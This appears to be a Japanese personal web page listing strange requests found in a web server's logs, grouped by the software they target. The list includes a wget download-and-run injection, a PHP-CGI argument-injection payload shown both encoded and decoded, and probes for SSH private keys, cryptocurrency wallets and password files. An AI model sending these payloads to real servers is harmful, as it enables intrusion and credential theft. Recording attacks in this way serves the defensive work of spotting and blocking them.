変なアクセス

Apache

/icons/apache_pb.gif
/webdav/
"\x80w\x01\x03\x01"  (methodなし)
/?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;
/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day;

Bitcoin

/db/.bitcoin/wallet.dat
/.bitcoin/wallet.dat

ColdFusion

/CFIDE/administrator/enter.cfm

Drupal

/user/soapCaller.bs

EPGrec

/epgrec/js/jquery.validate.min.js
/epgrec/do-record.sh
/epgrec/systemSetting.php
/epgrec/gen-thumbnail.sh

FCKeditor

/Fckeditor/editor/filemanager/browser/default/connectors/test.html
/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html
/editor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
/admin/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html
/editor/editor/filemanager/browser/default/connectors/uploadtest.html

foltia

/foltia/

horde

//
//horde/
//imp/
//horde/imp/
//webmail/
//mail/
//email/
//horde-webmail/
//horde/mimp/
//mimp/

IE11

/browserconfig.xml

JBOSS

/web-console/ServerInfo.jsp
/jmx-console/

Linksysルーター

/HNAP1/

PHP

/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
 -> /cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
/cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
 -> /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
/cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
 -> /cgi-bin/php-cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
 -> /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
/cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
 -> /cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
 -> /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n
//cgi-bin/php
//cgi-bin/php5
//cgi-bin/php-cgi
//cgi-bin/php.cgi
//cgi-bin/php4
"GET /cgi-bin/php

phpMyAdmin

/phpMyAdmin/scripts/setup.php
/pma/scripts/setup.php
/myadmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/phpmyadmin/scripts/setup.php
/pma/scripts/setup.php
/myadmin/scripts/setup.php
/MyAdmin/scripts/setup.php
/PHPMYADMIN/scripts/setup.php
/pMA/scripts/setup.php
/PMA/scripts/setup.php
/SQL/scripts/setup.php
/db/scripts/setup.php
/dbadmin/scripts/setup.php
/pHpMyAdMiN/scripts/setup.php
/pma/scripts/setup.php
/sql/scripts/setup.php
/MySQLAdmin/scripts/setup.php
/web/scripts/setup.php
/websql/scripts/setup.php
/phpMyAdmin-2/scripts/setup.php
/apache-default/phpmyadmin/scripts/setup.php
/blog/phpmyadmin/scripts/setup.php
/cpanelphpmyadmin/scripts/setup.php
/cpphpmyadmin/scripts/setup.php
/forum/phpmyadmin/scripts/setup.php
/admin/scripts/setup.php
/admin/pma/scripts/setup.php
/admin/phpmyadmin/scripts/setup.php
/db/scripts/setup.php
/dbadmin/scripts/setup.php

Tomcat

/manager/html
/invoker/EJBInvokerServlet

TYPO3

/typo3/index.php

WordPress

/blog/xmlrpc.php
/Blogxmlrpc.php
/myblog/xmlrpc.php
/word/xmlrpc.php
/wordpress/xmlrpc.php
/Wordpress/xmlrpc.php
/xmlrpc.php
/wp-login.php

sshなど

/checknfurl123
/.ssh/id_rsa
/.ssh/id_dsa
/.ssh/rsa
/.ssh/dsa
/.ssh/key
/.ssh/priv
/.ssh/id_rsa.old
/.ssh/id_dsa.old
/.ssh/identity
/.ssh/authorized_keys
/.ssh/authorized_keys2
/.ssh/known_hosts
/.ssh/config
/.ssh/config.old
/.ssh/config~
/.ssh/id_rsa.pub
/.ssh/id_dsa.pub
/.ssh/id_rsa_2
/.ssh/id_rsa.2
/.ssh/id_dsa_2
/.ssh/id_dsa.2
/.ssh/id_ecdsa
/.ssh/id_ecdsa.2
/.ssh/id_ecdsa_2
/.ssh/id_rsa2
/.ssh/id_dsa2
/.ssh/id_ecdsa2
/.ssh/id_ecdsa_old
/.ssh/id_ecdsa.old
/.ssh/id_rsa.bak
/.ssh/id_dsa.bak
/.bash_history
/.history
/.sh_history
/.bitcoin/wallet.dat
/.litecoin/wallet.dat
/.psi/profiles/default/config.xml
/.purple/accounts.xml
/.mozilla/firefox/profiles.ini
/id_ecdsa
/id_ecdsa.2
/id_ecdsa_2
/id_ecdsa_old
/id_ecdsa.old
/config
/id_rsa
/id_dsa
/rsa
/dsa
/key
/key.priv
/id_rsa.old
/id_dsa.old
/identity
/authorized_keys
/authorized_keys2
/known_hosts
/id_rsa.pub
/id_dsa.pub
/.htpasswd
/htpasswd
/.htpasswd~
/passwd
/.passwd
/passwords
/password
/passwords.txt
/pass

踏み台調査?

CONNECT mx0.mail2000.com.tw:25
CONNECT mx2.mail2000.com.tw:25
CONNECT mx3.mail2000.com.tw:25
CONNECT mta6.am0.yahoodns.net:25
http://37.28.156.211/sprawdza.php
http://hotel.qunar.com/render/hoteldiv.jsp?&__jscallback=XQScript_4 
http://www.baidu.com/
http://www.daydaydata.com/proxy.txt
http://todd0738.gotoip4.com//hello.html
http://www.google.com/
http://24x7-allrequestsallowed.com/?PHPSESSID=1rxsxtj500143PUVJW%5EEY%40MFVFV
http://z.nixipdb.com/
http://www.google.pl/search?q=wakacje
http://92.222.28.46/httptest.php
http://httpheader.net
http://www.k2proxy.com//hello.html
http://www.taobao.com/

不明

/phpTest/zologize/axa.php
/admin.php
/administrator/index.php
/administrator/
/admin/index.php
/rutorrent
/abcdefghijk.php
/rxcx.php
/cgi-bin/rtpd.cgi?/bin/busybox
/con/trust/
/rom-0
/index.asp?request=Ch&index=0
/notify.php
/xnotify.php
/x.php
/cx.php
/chck.php
/docs/funcspecs/3.jsp
/live/lnws/workflow4/mnf.m3u8?ct=4&se=jiangsu
/css/epg.css
/api/
/Droid/login.php
/rat/login.php
/master/login.php
/cp.php?m=login
/w00tw00t.at.blackhats.romanian.anti-sec:)


  • Prev